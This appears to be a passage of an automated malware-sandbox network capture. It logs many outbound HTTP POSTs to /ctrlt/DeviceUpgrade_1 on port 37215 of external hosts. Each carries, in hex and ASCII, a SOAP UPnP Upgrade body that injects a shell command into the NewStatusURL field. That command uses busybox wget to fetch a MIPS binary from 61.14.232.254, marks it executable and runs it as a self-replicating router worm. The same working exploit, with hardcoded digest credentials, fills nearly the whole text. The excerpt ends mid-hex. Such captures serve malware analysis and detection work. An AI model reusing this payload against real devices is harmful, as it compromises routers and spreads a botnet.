                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  592192.168.2.1343852197.7.6.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.326097965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  593192.168.2.1348194197.238.190.22137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.326112032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  594192.168.2.1358258157.139.185.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.326133013 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  595192.168.2.1334498157.111.80.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.326153994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  596192.168.2.1357386197.129.154.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.326174021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  597192.168.2.1350766197.189.160.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.326194048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  598192.168.2.135225481.204.61.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.326395988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  599192.168.2.1334024197.26.22.3937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.326407909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  600192.168.2.135578041.66.44.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.326422930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  601192.168.2.1348810157.252.196.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.330136061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 